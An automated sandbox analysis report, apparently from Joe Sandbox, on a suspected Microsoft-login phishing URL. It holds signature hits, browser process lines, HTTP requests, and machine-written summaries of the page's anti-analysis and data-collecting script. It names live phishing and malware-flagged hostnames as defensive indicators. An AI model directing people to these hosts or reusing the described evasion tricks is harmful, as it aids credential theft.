Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://2ol.itectaxice.ru/Qm75/

Overview

General Information

Sample URL:https://2ol.itectaxice.ru/Qm75/
Analysis ID:1591007
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
AI detected suspicious Javascript
AI detected suspicious URL
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL

Classification

  • System is w10x64
  • chrome.exe (PID: 5896 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 3232 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=1908,i,5728571239909493604,3707031893138977265,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 1904 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://2ol.itectaxice.ru/Qm75/" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://aywreru71bxriulr9w5xt2j5yyfcmh7nad9q469mzz3lbp4cdrovxgyj.ivertoneym.ru/zsTJyqSCknJosAIyosVtewsSHSVmVVNLKRTMTTWQLLZIYRKPFDIHEYUXSUGIYXFYQUPUQZAvira URL Cloud: Label: malware

Phishing

barindex
Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://2ol.itectaxice.ru/Qm75/... This script exhibits several high-risk behaviors, including disabling common developer tools and keyboard shortcuts, as well as redirecting the user to a suspicious domain (login.microsoftonline.com) after a delay. The script appears to be attempting to prevent analysis and hide its true purpose, which is likely malicious.
Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://2ol.itectaxice.ru/Qm75/... The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. While some of the behaviors may be related to legitimate functionality, such as analytics or telemetry, the overall risk level is elevated due to the presence of malicious indicators. Further investigation is recommended to determine the true intent and potential impact of this script.
Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://2ol.itectaxice.ru/Qm75/... This script exhibits several high-risk behaviors, including data exfiltration, redirects to suspicious domains, and obfuscated code/URLs. It collects user data and sends it to an unknown domain, and it also redirects the user to a Microsoft login page, which could be part of a phishing attempt. The script's overall behavior is highly suspicious and poses a significant security risk.
Source: URLJoe Sandbox AI: AI detected Typosquatting in URL: https://2ol.itectaxice.ru
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724643026717835.NmU2NmQzNmYtYTZlZC00MGUzLTkyNDgtNzAwYzZlNzhkYWY5YmJlYzc2MzctZDhjMS00YmM3LTgwNDAtZTM2NTMxOTczNzRj&ui_locales=en-US&mkt=en-US&client-request-id=3dd90492-9109-4d97-89ce-2074f267d134&state=BxuBFhGAuYAWcjR8cV2c-JZAeAXOJXjnAgELJSBbdfvkyuN64wqQvuFh5OD0VHhtAD7Og0CtyWqP4VOw8vR3EsyHAGTMPrcI1vgC7KHu8elGLUFHHfBuXpIfGJ3gMu2lpBDj94mBFBmFRjpadN9pwAAe6Ex2E0GztosgDzq_tW-ktCt7cYO2VgMkyaLjGLVNDqxB6HXcucfE5-cDbXBmQaTrAt4l-Z12eYyXsVbjM160QuceuRZxxQhEmiX6vbiLMl7x9vzT-L9TKmcmrkT6ow&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724643026717835.NmU2NmQzNmYtYTZlZC00MGUzLTkyNDgtNzAwYzZlNzhkYWY5YmJlYzc2MzctZDhjMS00YmM3LTgwNDAtZTM2NTMxOTczNzRj&ui_locales=en-US&mkt=en-US&client-request-id=3dd90492-9109-4d97-89ce-2074f267d134&state=BxuBFhGAuYAWcjR8cV2c-JZAeAXOJXjnAgELJSBbdfvkyuN64wqQvuFh5OD0VHhtAD7Og0CtyWqP4VOw8vR3EsyHAGTMPrcI1vgC7KHu8elGLUFHHfBuXpIfGJ3gMu2lpBDj94mBFBmFRjpadN9pwAAe6Ex2E0GztosgDzq_tW-ktCt7cYO2VgMkyaLjGLVNDqxB6HXcucfE5-cDbXBmQaTrAt4l-Z12eYyXsVbjM160QuceuRZxxQhEmiX6vbiLMl7x9vzT-L9TKmcmrkT6ow&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724643026717835.NmU2NmQzNmYtYTZlZC00MGUzLTkyNDgtNzAwYzZlNzhkYWY5YmJlYzc2MzctZDhjMS00YmM3LTgwNDAtZTM2NTMxOTczNzRj&ui_locales=en-US&mkt=en-US&client-request-id=3dd90492-9109-4d97-89ce-2074f267d134&state=BxuBFhGAuYAWcjR8cV2c-JZAeAXOJXjnAgELJSBbdfvkyuN64wqQvuFh5OD0VHhtAD7Og0CtyWqP4VOw8vR3EsyHAGTMPrcI1vgC7KHu8elGLUFHHfBuXpIfGJ3gMu2lpBDj94mBFBmFRjpadN9pwAAe6Ex2E0GztosgDzq_tW-ktCt7cYO2VgMkyaLjGLVNDqxB6HXcucfE5-cDbXBmQaTrAt4l-Z12eYyXsVbjM160QuceuRZxxQhEmiX6vbiLMl7x9vzT-L9TKmcmrkT6ow&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Base64 decoded: 6e66d36f-a6ed-40e3-9248-700c6e78daf9bbec7637-d8c1-4bc7-8040-e3653197374c
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724643026717835.NmU2NmQzNmYtYTZlZC00MGUzLTkyNDgtNzAwYzZlNzhkYWY5YmJlYzc2MzctZDhjMS00YmM3LTgwNDAtZTM2NTMxOTczNzRj&ui_locales=en-US&mkt=en-US&client-request-id=3dd90492-9109-4d97-89ce-2074f267d134&state=BxuBFhGAuYAWcjR8cV2c-JZAeAXOJXjnAgELJSBbdfvkyuN64wqQvuFh5OD0VHhtAD7Og0CtyWqP4VOw8vR3EsyHAGTMPrcI1vgC7KHu8elGLUFHHfBuXpIfGJ3gMu2lpBDj94mBFBmFRjpadN9pwAAe6Ex2E0GztosgDzq_tW-ktCt7cYO2VgMkyaLjGLVNDqxB6HXcucfE5-cDbXBmQaTrAt4l-Z12eYyXsVbjM160QuceuRZxxQhEmiX6vbiLMl7x9vzT-L9TKmcmrkT6ow&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Title: Redirecting does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724643026717835.NmU2NmQzNmYtYTZlZC00MGUzLTkyNDgtNzAwYzZlNzhkYWY5YmJlYzc2MzctZDhjMS00YmM3LTgwNDAtZTM2NTMxOTczNzRj&ui_locales=en-US&mkt=en-US&client-request-id=3dd90492-9109-4d97-89ce-2074f267d134&state=BxuBFhGAuYAWcjR8cV2c-JZAeAXOJXjnAgELJSBbdfvkyuN64wqQvuFh5OD0VHhtAD7Og0CtyWqP4VOw8vR3EsyHAGTMPrcI1vgC7KHu8elGLUFHHfBuXpIfGJ3gMu2lpBDj94mBFBmFRjpadN9pwAAe6Ex2E0GztosgDzq_tW-ktCt7cYO2VgMkyaLjGLVNDqxB6HXcucfE5-cDbXBmQaTrAt4l-Z12eYyXsVbjM160QuceuRZxxQhEmiX6vbiLMl7x9vzT-L9TKmcmrkT6ow&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Title: Sign in to your account does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724643026717835.NmU2NmQzNmYtYTZlZC00MGUzLTkyNDgtNzAwYzZlNzhkYWY5YmJlYzc2MzctZDhjMS00YmM3LTgwNDAtZTM2NTMxOTczNzRj&ui_locales=en-US&mkt=en-US&client-request-id=3dd90492-9109-4d97-89ce-2074f267d134&state=BxuBFhGAuYAWcjR8cV2c-JZAeAXOJXjnAgELJSBbdfvkyuN64wqQvuFh5OD0VHhtAD7Og0CtyWqP4VOw8vR3EsyHAGTMPrcI1vgC7KHu8elGLUFHHfBuXpIfGJ3gMu2lpBDj94mBFBmFRjpadN9pwAAe6Ex2E0GztosgDzq_tW-ktCt7cYO2VgMkyaLjGLVNDqxB6HXcucfE5-cDbXBmQaTrAt4l-Z12eYyXsVbjM160QuceuRZxxQhEmiX6vbiLMl7x9vzT-L9TKmcmrkT6ow&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: <input type="password" .../> found
Source: https://2ol.itectaxice.ru/Qm75/HTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724643026717835.NmU2NmQzNmYtYTZlZC00MGUzLTkyNDgtNzAwYzZlNzhkYWY5YmJlYzc2MzctZDhjMS00YmM3LTgwNDAtZTM2NTMxOTczNzRj&ui_locales=en-US&mkt=en-US&client-request-id=3dd90492-9109-4d97-89ce-2074f267d134&state=BxuBFhGAuYAWcjR8cV2c-JZAeAXOJXjnAgELJSBbdfvkyuN64wqQvuFh5OD0VHhtAD7Og0CtyWqP4VOw8vR3EsyHAGTMPrcI1vgC7KHu8elGLUFHHfBuXpIfGJ3gMu2lpBDj94mBFBmFRjpadN9pwAAe6Ex2E0GztosgDzq_tW-ktCt7cYO2VgMkyaLjGLVNDqxB6HXcucfE5-cDbXBmQaTrAt4l-Z12eYyXsVbjM160QuceuRZxxQhEmiX6vbiLMl7x9vzT-L9TKmcmrkT6ow&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724643026717835.NmU2NmQzNmYtYTZlZC00MGUzLTkyNDgtNzAwYzZlNzhkYWY5YmJlYzc2MzctZDhjMS00YmM3LTgwNDAtZTM2NTMxOTczNzRj&ui_locales=en-US&mkt=en-US&client-request-id=3dd90492-9109-4d97-89ce-2074f267d134&state=BxuBFhGAuYAWcjR8cV2c-JZAeAXOJXjnAgELJSBbdfvkyuN64wqQvuFh5OD0VHhtAD7Og0CtyWqP4VOw8vR3EsyHAGTMPrcI1vgC7KHu8elGLUFHHfBuXpIfGJ3gMu2lpBDj94mBFBmFRjpadN9pwAAe6Ex2E0GztosgDzq_tW-ktCt7cYO2VgMkyaLjGLVNDqxB6HXcucfE5-cDbXBmQaTrAt4l-Z12eYyXsVbjM160QuceuRZxxQhEmiX6vbiLMl7x9vzT-L9TKmcmrkT6ow&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724643026717835.NmU2NmQzNmYtYTZlZC00MGUzLTkyNDgtNzAwYzZlNzhkYWY5YmJlYzc2MzctZDhjMS00YmM3LTgwNDAtZTM2NTMxOTczNzRj&ui_locales=en-US&mkt=en-US&client-request-id=3dd90492-9109-4d97-89ce-2074f267d134&state=BxuBFhGAuYAWcjR8cV2c-JZAeAXOJXjnAgELJSBbdfvkyuN64wqQvuFh5OD0VHhtAD7Og0CtyWqP4VOw8vR3EsyHAGTMPrcI1vgC7KHu8elGLUFHHfBuXpIfGJ3gMu2lpBDj94mBFBmFRjpadN9pwAAe6Ex2E0GztosgDzq_tW-ktCt7cYO2VgMkyaLjGLVNDqxB6HXcucfE5-cDbXBmQaTrAt4l-Z12eYyXsVbjM160QuceuRZxxQhEmiX6vbiLMl7x9vzT-L9TKmcmrkT6ow&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724643026717835.NmU2NmQzNmYtYTZlZC00MGUzLTkyNDgtNzAwYzZlNzhkYWY5YmJlYzc2MzctZDhjMS00YmM3LTgwNDAtZTM2NTMxOTczNzRj&ui_locales=en-US&mkt=en-US&client-request-id=3dd90492-9109-4d97-89ce-2074f267d134&state=BxuBFhGAuYAWcjR8cV2c-JZAeAXOJXjnAgELJSBbdfvkyuN64wqQvuFh5OD0VHhtAD7Og0CtyWqP4VOw8vR3EsyHAGTMPrcI1vgC7KHu8elGLUFHHfBuXpIfGJ3gMu2lpBDj94mBFBmFRjpadN9pwAAe6Ex2E0GztosgDzq_tW-ktCt7cYO2VgMkyaLjGLVNDqxB6HXcucfE5-cDbXBmQaTrAt4l-Z12eYyXsVbjM160QuceuRZxxQhEmiX6vbiLMl7x9vzT-L9TKmcmrkT6ow&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724643026717835.NmU2NmQzNmYtYTZlZC00MGUzLTkyNDgtNzAwYzZlNzhkYWY5YmJlYzc2MzctZDhjMS00YmM3LTgwNDAtZTM2NTMxOTczNzRj&ui_locales=en-US&mkt=en-US&client-request-id=3dd90492-9109-4d97-89ce-2074f267d134&state=BxuBFhGAuYAWcjR8cV2c-JZAeAXOJXjnAgELJSBbdfvkyuN64wqQvuFh5OD0VHhtAD7Og0CtyWqP4VOw8vR3EsyHAGTMPrcI1vgC7KHu8elGLUFHHfBuXpIfGJ3gMu2lpBDj94mBFBmFRjpadN9pwAAe6Ex2E0GztosgDzq_tW-ktCt7cYO2VgMkyaLjGLVNDqxB6HXcucfE5-cDbXBmQaTrAt4l-Z12eYyXsVbjM160QuceuRZxxQhEmiX6vbiLMl7x9vzT-L9TKmcmrkT6ow&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724643026717835.NmU2NmQzNmYtYTZlZC00MGUzLTkyNDgtNzAwYzZlNzhkYWY5YmJlYzc2MzctZDhjMS00YmM3LTgwNDAtZTM2NTMxOTczNzRj&ui_locales=en-US&mkt=en-US&client-request-id=3dd90492-9109-4d97-89ce-2074f267d134&state=BxuBFhGAuYAWcjR8cV2c-JZAeAXOJXjnAgELJSBbdfvkyuN64wqQvuFh5OD0VHhtAD7Og0CtyWqP4VOw8vR3EsyHAGTMPrcI1vgC7KHu8elGLUFHHfBuXpIfGJ3gMu2lpBDj94mBFBmFRjpadN9pwAAe6Ex2E0GztosgDzq_tW-ktCt7cYO2VgMkyaLjGLVNDqxB6HXcucfE5-cDbXBmQaTrAt4l-Z12eYyXsVbjM160QuceuRZxxQhEmiX6vbiLMl7x9vzT-L9TKmcmrkT6ow&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724643026717835.NmU2NmQzNmYtYTZlZC00MGUzLTkyNDgtNzAwYzZlNzhkYWY5YmJlYzc2MzctZDhjMS00YmM3LTgwNDAtZTM2NTMxOTczNzRj&ui_locales=en-US&mkt=en-US&client-request-id=3dd90492-9109-4d97-89ce-2074f267d134&state=BxuBFhGAuYAWcjR8cV2c-JZAeAXOJXjnAgELJSBbdfvkyuN64wqQvuFh5OD0VHhtAD7Og0CtyWqP4VOw8vR3EsyHAGTMPrcI1vgC7KHu8elGLUFHHfBuXpIfGJ3gMu2lpBDj94mBFBmFRjpadN9pwAAe6Ex2E0GztosgDzq_tW-ktCt7cYO2VgMkyaLjGLVNDqxB6HXcucfE5-cDbXBmQaTrAt4l-Z12eYyXsVbjM160QuceuRZxxQhEmiX6vbiLMl7x9vzT-L9TKmcmrkT6ow&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724643026717835.NmU2NmQzNmYtYTZlZC00MGUzLTkyNDgtNzAwYzZlNzhkYWY5YmJlYzc2MzctZDhjMS00YmM3LTgwNDAtZTM2NTMxOTczNzRj&ui_locales=en-US&mkt=en-US&client-request-id=3dd90492-9109-4d97-89ce-2074f267d134&state=BxuBFhGAuYAWcjR8cV2c-JZAeAXOJXjnAgELJSBbdfvkyuN64wqQvuFh5OD0VHhtAD7Og0CtyWqP4VOw8vR3EsyHAGTMPrcI1vgC7KHu8elGLUFHHfBuXpIfGJ3gMu2lpBDj94mBFBmFRjpadN9pwAAe6Ex2E0GztosgDzq_tW-ktCt7cYO2VgMkyaLjGLVNDqxB6HXcucfE5-cDbXBmQaTrAt4l-Z12eYyXsVbjM160QuceuRZxxQhEmiX6vbiLMl7x9vzT-L9TKmcmrkT6ow&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724643026717835.NmU2NmQzNmYtYTZlZC00MGUzLTkyNDgtNzAwYzZlNzhkYWY5YmJlYzc2MzctZDhjMS00YmM3LTgwNDAtZTM2NTMxOTczNzRj&ui_locales=en-US&mkt=en-US&client-request-id=3dd90492-9109-4d97-89ce-2074f267d134&state=BxuBFhGAuYAWcjR8cV2c-JZAeAXOJXjnAgELJSBbdfvkyuN64wqQvuFh5OD0VHhtAD7Og0CtyWqP4VOw8vR3EsyHAGTMPrcI1vgC7KHu8elGLUFHHfBuXpIfGJ3gMu2lpBDj94mBFBmFRjpadN9pwAAe6Ex2E0GztosgDzq_tW-ktCt7cYO2VgMkyaLjGLVNDqxB6HXcucfE5-cDbXBmQaTrAt4l-Z12eYyXsVbjM160QuceuRZxxQhEmiX6vbiLMl7x9vzT-L9TKmcmrkT6ow&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: global trafficTCP traffic: 192.168.2.7:49792 -> 1.1.1.1:53
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /Qm75/ HTTP/1.1Host: 2ol.itectaxice.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://2ol.itectaxice.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://2ol.itectaxice.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://2ol.itectaxice.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://2ol.itectaxice.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
